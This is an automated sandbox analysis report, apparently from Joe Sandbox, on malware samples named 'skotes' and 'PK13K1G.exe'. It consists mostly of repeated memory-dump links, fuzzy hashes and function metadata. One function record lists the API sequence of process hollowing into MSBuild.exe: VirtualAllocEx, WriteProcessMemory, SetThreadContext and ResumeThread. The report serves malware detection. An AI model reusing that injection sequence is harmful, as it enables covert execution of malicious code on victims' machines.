Associated: 00000001.00000002.1764469090.0000000000F20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764486811.0000000000F82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764632061.0000000000F89000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764651952.0000000000F8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764699572.0000000000F97000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765407891.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765584405.00000000010F4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765652888.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765652888.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765871305.0000000001116000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765944083.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766080956.0000000001119000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766154075.000000000111A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766218614.0000000001123000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766318694.0000000001128000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766444780.000000000113A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766538376.000000000113B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766631836.000000000113E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766711551.000000000113F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767052544.0000000001140000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767154042.0000000001141000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767197130.0000000001142000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767219062.0000000001154000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767239174.0000000001169000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767255320.000000000116B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767273611.0000000001172000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767292973.0000000001179000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767312917.000000000117A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767352309.0000000001182000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767419167.0000000001194000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767479718.0000000001196000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767521370.000000000119E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767542098.00000000011A2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767578961.00000000011A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767644452.00000000011A7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767665829.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767712234.00000000011B0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767754474.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767771677.00000000011C0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767794038.00000000011DF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767809600.00000000011E0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767809600.00000000011EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767848196.0000000001219000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767865409.000000000121A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767880642.000000000121B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767897134.000000000121F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767912523.0000000001221000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767929458.000000000122F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767944890.0000000001230000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: dfc73400ade90886e0be9b1a4aeeb2882aa3882772ba5363a861ad27e312458e
Instruction ID: 7885ce889180a6e152026eb2676ae8e948847061c1953358353ac4bbe70ac730
Opcode Fuzzy Hash: dfc73400ade90886e0be9b1a4aeeb2882aa3882772ba5363a861ad27e312458e
Instruction Fuzzy Hash: B621AC31A48211DBFB246768FD8A7BDB292DF80710F600816F108D73D2DB7E8881B253

Function 00F2A34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F2A963
CreateMutexA.KERNELBASE(00000000,00000000,00F83254), ref: 00F2A981

Memory Dump Source

Source File: 00000001.00000002.1764486811.0000000000F21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000001.00000002.1764469090.0000000000F20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764486811.0000000000F82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764632061.0000000000F89000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764651952.0000000000F8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764699572.0000000000F97000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765407891.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765584405.00000000010F4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765652888.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765652888.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765871305.0000000001116000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765944083.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766080956.0000000001119000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766154075.000000000111A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766218614.0000000001123000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766318694.0000000001128000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766444780.000000000113A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766538376.000000000113B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766631836.000000000113E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766711551.000000000113F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767052544.0000000001140000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767154042.0000000001141000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767197130.0000000001142000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767219062.0000000001154000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767239174.0000000001169000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767255320.000000000116B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767273611.0000000001172000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767292973.0000000001179000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767312917.000000000117A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767352309.0000000001182000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767419167.0000000001194000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767479718.0000000001196000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767521370.000000000119E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767542098.00000000011A2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767578961.00000000011A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767644452.00000000011A7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767665829.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767712234.00000000011B0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767754474.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767771677.00000000011C0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767794038.00000000011DF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767809600.00000000011E0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767809600.00000000011EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767848196.0000000001219000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767865409.000000000121A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767880642.000000000121B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767897134.000000000121F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767912523.0000000001221000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767929458.000000000122F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767944890.0000000001230000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: fc6ea57e92b16551658a1033d01aedd6cbf0874ec705b799bf51f2c9b6afd963
Instruction ID: bfca953b8c2127536896174386da93b69495e568c06a8300c6a1ae25decc9b9a
Opcode Fuzzy Hash: fc6ea57e92b16551658a1033d01aedd6cbf0874ec705b799bf51f2c9b6afd963
Instruction Fuzzy Hash: 3A2149326042009BEB18DB68FC8976CB7A2EBC1721F244219E414DB6D5D77A99C0A752

Non-executed Functions

Function 00F5CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00F5CC66

Memory Dump Source

Source File: 00000001.00000002.1764486811.0000000000F21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000001.00000002.1764469090.0000000000F20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764486811.0000000000F82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764632061.0000000000F89000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764651952.0000000000F8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764699572.0000000000F97000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765407891.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765584405.00000000010F4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765652888.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765652888.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765871305.0000000001116000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765944083.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766080956.0000000001119000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766154075.000000000111A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766218614.0000000001123000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766318694.0000000001128000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766444780.000000000113A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766538376.000000000113B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766631836.000000000113E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766711551.000000000113F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767052544.0000000001140000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767154042.0000000001141000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767197130.0000000001142000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767219062.0000000001154000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767239174.0000000001169000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767255320.000000000116B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767273611.0000000001172000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767292973.0000000001179000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767312917.000000000117A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767352309.0000000001182000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767419167.0000000001194000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767479718.0000000001196000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767521370.000000000119E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767542098.00000000011A2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767578961.00000000011A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767644452.00000000011A7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767665829.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767712234.00000000011B0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767754474.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767771677.00000000011C0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767794038.00000000011DF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767809600.00000000011E0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767809600.00000000011EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767848196.0000000001219000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767865409.000000000121A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767880642.000000000121B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767897134.000000000121F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767912523.0000000001221000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767929458.000000000122F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767944890.0000000001230000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f20000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction ID: 8e2829a9abf09d42a41e11940d2ed941afd2f41158e8016e590fb4c86d607bf0
Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction Fuzzy Hash: C8B12332D003859FDB11CF28C8827AEBBB5EF45351F14416ADE56EB242D6388D0ADBE0

Function 00F22EC0 Relevance: 6.3, APIs: 4, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00F22F5F
__Mtx_unlock.LIBCPMT ref: 00F22FCC
__Mtx_unlock.LIBCPMT ref: 00F230F5
__Mtx_unlock.LIBCPMT ref: 00F2319B

Memory Dump Source

Source File: 00000001.00000002.1764486811.0000000000F21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000001.00000002.1764469090.0000000000F20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764486811.0000000000F82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764632061.0000000000F89000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764651952.0000000000F8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764699572.0000000000F97000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765407891.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765584405.00000000010F4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765652888.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765652888.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765871305.0000000001116000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765944083.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766080956.0000000001119000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766154075.000000000111A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766218614.0000000001123000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766318694.0000000001128000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766444780.000000000113A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766538376.000000000113B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766631836.000000000113E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766711551.000000000113F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767052544.0000000001140000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767154042.0000000001141000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767197130.0000000001142000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767219062.0000000001154000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767239174.0000000001169000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767255320.000000000116B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767273611.0000000001172000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767292973.0000000001179000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767312917.000000000117A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767352309.0000000001182000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767419167.0000000001194000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767479718.0000000001196000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767521370.000000000119E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767542098.00000000011A2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767578961.00000000011A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767644452.00000000011A7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767665829.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767712234.00000000011B0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767754474.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767771677.00000000011C0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767794038.00000000011DF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767809600.00000000011E0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767809600.00000000011EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767848196.0000000001219000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767865409.000000000121A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767880642.000000000121B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767897134.000000000121F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767912523.0000000001221000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767929458.000000000122F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767944890.0000000001230000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f20000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock
String ID:
API String ID: 1418687624-0
Opcode ID: e91b6ba7f082441653ae6817d2f51d31785063b7f8b84a59383c91336b5b6c9c
Instruction ID: 2502c2d0afcb545010fe0ff28ad9606fabc0161f27f87d54ffe08e7f47f5c1d9
Opcode Fuzzy Hash: e91b6ba7f082441653ae6817d2f51d31785063b7f8b84a59383c91336b5b6c9c
Instruction Fuzzy Hash: 8BA1F2B1E01225AFDB10DF64DD4575AB7A8FF14334F048129E815E7241EB39EA14EBE1

Analysis Process: PK13K1G.exePID: 3864, Parent PID: 3688COMMON

Execution Graph

Execution Coverage:	7.9%
Dynamic/Decrypted Code Coverage:	0.6%
Signature Coverage:	1.4%
Total number of Nodes:	1336
Total number of Limit Nodes:	10

Executed Functions

Function 0003A1A9 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0003A11B,0003A10B), ref: 0003A33F
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0003A352
Wow64GetThreadContext.KERNEL32(0000009C,00000000), ref: 0003A370
ReadProcessMemory.KERNELBASE(00000098,?,0003A15F,00000004,00000000), ref: 0003A394
VirtualAllocEx.KERNELBASE(00000098,?,?,00003000,00000040), ref: 0003A3BF
WriteProcessMemory.KERNELBASE(00000098,00000000,?,?,00000000,?), ref: 0003A417
WriteProcessMemory.KERNELBASE(00000098,00400000,?,?,00000000,?,00000028), ref: 0003A462
WriteProcessMemory.KERNELBASE(00000098,?,?,00000004,00000000), ref: 0003A4A0
Wow64SetThreadContext.KERNEL32(0000009C,00640000), ref: 0003A4DC
ResumeThread.KERNELBASE(0000009C), ref: 0003A4EB

Strings

ReadProcessMemory, xrefs: 0003A294
ResumeThread, xrefs: 0003A2E3
GetThreadContext, xrefs: 0003A281
VirtualAllocEx, xrefs: 0003A2A7
WriteProcessMemory, xrefs: 0003A2BA
TerminateProcess, xrefs: 0003A3CE
aryA, xrefs: 0003A1ED
SetThreadContext, xrefs: 0003A2CD
Load, xrefs: 0003A1E5
ress, xrefs: 0003A231
VirtualAlloc, xrefs: 0003A26E
GetP, xrefs: 0003A229
CreateProcessW, xrefs: 0003A25B
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 0003A33E

Memory Dump Source

Source File: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-3857624555
Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction ID: 67728a1fb809e3ffee7cb4463d54f7fb06b7e701b729feb7d774c93e5671e705
Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction Fuzzy Hash: 43B1F67660024AAFDB60CF68CC80BDA73A9FF88714F158524EA08AB341D770FA51CB94

Function 000294CE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,7DBFEC36,?,000295DD,?,?,00000000), ref: 0002958F

Strings

ext-ms-, xrefs: 00029539
api-ms-, xrefs: 00029525

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 07a564f08ec1a0719e6cb32a07ebe024df3b3a30f756e0c11abd0b64902d1f2f
Instruction ID: ce1c58192c643f8ad419e7be1bf6ee1b9bd0955a3c77ff90747a420994d91ba5
Opcode Fuzzy Hash: 07a564f08ec1a0719e6cb32a07ebe024df3b3a30f756e0c11abd0b64902d1f2f
Instruction Fuzzy Hash: D9210A71B01631ABE7339B65FC80A5A77ACEB45761F250120FE0AA7291DB34EE05C7D0

Function 00021930 Relevance: 9.2, APIs: 6, Instructions: 196
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 000219D0
GetFileSize.KERNEL32 ref: 00021A01
CloseHandle.KERNEL32 ref: 00021A1E

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

